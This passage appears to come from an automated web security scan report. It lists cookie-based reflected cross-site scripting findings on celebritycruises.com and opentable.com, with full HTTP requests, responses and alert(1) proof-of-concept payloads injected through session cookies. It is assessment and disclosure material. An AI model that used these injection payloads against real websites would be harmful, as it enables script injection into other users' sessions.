                           <title>Plan and Book</title>
   <meta property="og:title" content="Plan and Book
...[SNIP]...
<p style="color: #333;">
Build: cel_com_09222011_1 2011-09-20 04:30 AM
last recached on Mon Oct 03 06:27:56 EDT 2011 000052bP0YHmMBHoM8_sGg4WKHr:12hdbd027dfd2e<script>alert(1)</script>3152c661bf6
</p>
...[SNIP]...
4.86. http://www.celebritycruises.com/search/vacationSearchResults.do [JSESSIONID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.celebritycruises.com
Path:   /search/vacationSearchResults.do

Issue detail

The value of the JSESSIONID cookie is copied into the HTML document as plain text between tags. The payload f78c3<script>alert(1)</script>fc81ed4d2f5 was submitted in the JSESSIONID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /search/vacationSearchResults.do?isWidget=false&dest=ANY&sailStartDate=ANY&sailEndDate=ANY&ship=ANY&port=ANY&duration=ANY&includeAdjascentPorts=Y&promoid=&promoType=&promotionTypeId=&priceProgram=&sortBy=4&startRow=0&count=10&cruiseType=CO&cruiseInt=Y&isCrieriaExcluded= HTTP/1.1
Host: www.celebritycruises.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.celebritycruises.com/search/loadCruiseConfigurator.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=000052bP0YHmMBHoM8_sGg4WKHr:12hdbd027f78c3<script>alert(1)</script>fc81ed4d2f5; wuc=USA; s_pers=%20s_evar44cvp%3D%255B%255B'Direct%252520Load'%252C'1317646043868'%255D%255D%7C1475498843868%3B%20s_evar46cvp%3D%255B%255B'Direct%252520Load'%252C'1317646043871'%255D%255D%7C1475498843871%3B; s_sess=%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en
Vary: Accept-Encoding
Content-Length: 85201
Date: Mon, 03 Oct 2011 12:48:33 GMT
Connection: close
Set-Cookie: JSESSIONID=0000yzyaj-B5e2uhREbN1QVTyHy:12hdbcveb; Path=/; Domain=celebritycruises.com
Set-Cookie: wuc=USA; Expires=Wed, 02 Oct 2013 12:48:33 GMT; Path=/; Domain=.celebritycruises.com


   <!DOCTYPE html>
<html>
   <head>
       <meta charset="utf-8">
       
           
                           <title>Plan and Book</title>
   <meta property="og:title" content="Plan and Book
...[SNIP]...
<p style="color: #333;">
Build: cel_com_09222011_1 2011-09-20 04:30 AM
last recached on Mon Oct 03 06:27:56 EDT 2011 000052bP0YHmMBHoM8_sGg4WKHr:12hdbd027f78c3<script>alert(1)</script>fc81ed4d2f5
</p>
...[SNIP]...
4.87. http://www.opentable.com/interim.aspx [lsCKE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /interim.aspx

Issue detail

The value of the lsCKE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f29da"><script>alert(1)</script>aab47995e43 was submitted in the lsCKE cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /interim.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestreff29da"><script>alert(1)</script>aab47995e43; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; pgseq=; ftc=x=10%2f03%2f2011+15%3a54%3a43&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=0

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:54:57 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a54%3a57&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=90&rra=1; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: lsCKE=ors=otrestreff29da"><script>alert(1)</script>aab47995e43&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=rJbB%2fhLqgoEHXmgKp6a0pg%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: lsCKE=ors=otrestreff29da"><script>alert(1)</script>aab47995e43&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=rJbB%2fhLqgoEHXmgKp6a0pg%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: lsCKE=ors=otrestreff29da"><script>alert(1)</script>aab47995e43&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=rJbB%2fhLqgoEHXmgKp6a0pg%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=1&vbefreg=1&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:54:57 GMT; path=/
Set-Cookie: lsCKE=ors=otrestreff29da"><script>alert(1)</script>aab47995e43&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=rJbB%2fhLqgoEHXmgKp6a0pg%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=1&vbefreg=1&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=1&vbefreg=1&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: lsCKE=ors=otrestreff29da"><script>alert(1)</script>aab47995e43&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=rJbB%2fhLqgoEHXmgKp6a0pg%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: lsCKE=ors=otrestreff29da"><script>alert(1)</script>aab47995e43&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=rJbB%2fhLqgoEHXmgKp6a0pg%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: lsCKE=ors=otrestreff29da"><script>alert(1)</script>aab47995e43&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=rJbB%2fhLqgoEHXmgKp6a0pg%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Vary: Accept-Encoding
Content-Length: 46338


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
...[SNIP]...
<img src="http://o.opentable.com/b/ss/otrestreff29da"><script>alert(1)</script>aab47995e43/1/H.22.1--NS/0" height="1" width="1" border="0" alt="" />
...[SNIP]...
4.88. http://www.opentable.com/interim.aspx [lsCKE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /interim.aspx

Issue detail

The value of the lsCKE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb1e9"-alert(1)-"a4ba175ba10 was submitted in the lsCKE cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /interim.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestrefcb1e9"-alert(1)-"a4ba175ba10; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; pgseq=; ftc=x=10%2f03%2f2011+15%3a54%3a43&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=0

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:54:57 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a54%3a57&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=90&rra=1; domain=.opentable.com; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: lsCKE=ors=otrestrefcb1e9"-alert(1)-"a4ba175ba10&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=M6UYKHKYVTca7zEymJLulg%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: lsCKE=ors=otrestrefcb1e9"-alert(1)-"a4ba175ba10&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=M6UYKHKYVTca7zEymJLulg%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: lsCKE=ors=otrestrefcb1e9"-alert(1)-"a4ba175ba10&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=M6UYKHKYVTca7zEymJLulg%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=4&vbefreg=4&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:54:57 GMT; path=/
Set-Cookie: lsCKE=ors=otrestrefcb1e9"-alert(1)-"a4ba175ba10&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=M6UYKHKYVTca7zEymJLulg%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=4&vbefreg=4&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=4&vbefreg=4&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: lsCKE=ors=otrestrefcb1e9"-alert(1)-"a4ba175ba10&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=M6UYKHKYVTca7zEymJLulg%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: lsCKE=ors=otrestrefcb1e9"-alert(1)-"a4ba175ba10&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=M6UYKHKYVTca7zEymJLulg%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: lsCKE=ors=otrestrefcb1e9"-alert(1)-"a4ba175ba10&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=M6UYKHKYVTca7zEymJLulg%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Vary: Accept-Encoding
Content-Length: 46311


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
...[SNIP]...
<!--
var s_account="otrestrefcb1e9"-alert(1)-"a4ba175ba10";
//-->
...[SNIP]...
4.89. http://www.opentable.com/opentables.aspx [lsCKE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /opentables.aspx

Issue detail

The value of the lsCKE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86571"-alert(1)-"6df2532a40d was submitted in the lsCKE cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opentables.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.opentable.com/interim.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref86571"-alert(1)-"6df2532a40d; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a44&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; pgseq=; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:55:00 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-02
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:22-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a55%3a00&p1=100&p1q=rid%3d90%26restref%3d90%26m%3d4%26t%3dsingle%26p%3d2%26d%3d10%252f3%252f2011%2b7%253a00%2bPM%26rtype%3dism_mod&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=100; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref86571"-alert(1)-"6df2532a40d&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=JfcZkNNS6r2CnZUe8zD3Tw%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref86571"-alert(1)-"6df2532a40d&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=JfcZkNNS6r2CnZUe8zD3Tw%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: lsCKE=ors=otrestref86571"-alert(1)-"6df2532a40d&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=JfcZkNNS6r2CnZUe8zD3Tw%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=9&vbefreg=9&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:55:00 GMT; path=/
